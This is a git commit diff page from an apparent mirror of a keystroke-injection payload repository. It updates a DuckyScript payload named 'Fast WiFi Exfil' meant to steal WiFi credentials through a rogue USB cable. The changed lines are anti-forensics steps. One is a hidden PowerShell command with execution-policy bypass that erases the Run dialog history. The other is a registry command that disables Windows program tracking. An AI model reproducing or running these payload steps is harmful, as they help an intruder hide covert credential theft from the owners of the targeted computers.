mirror of https://github.com/hak5/omg-payloads.git
Merge pull request #178 from Scrut1ny/patch-1
Update Fast WiFi Exfil (Powershell - No RunMRU History)pull/196/head
commit
0d27c643be
|
@ -11,7 +11,7 @@ ENTER
|
|||
DELAY 100
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -w h -ep bypass Remove-ItemProperty -Path ‘HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’ -Name ‘*’ -ErrorAction SilentlyContinue
|
||||
STRING reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Start_TrackProgs" /t REG_DWORD /d "0" /f
|
||||
ENTER
|
||||
DELAY 100
|
||||
EXIT
|
||||
|
|
Loading…
Reference in New Issue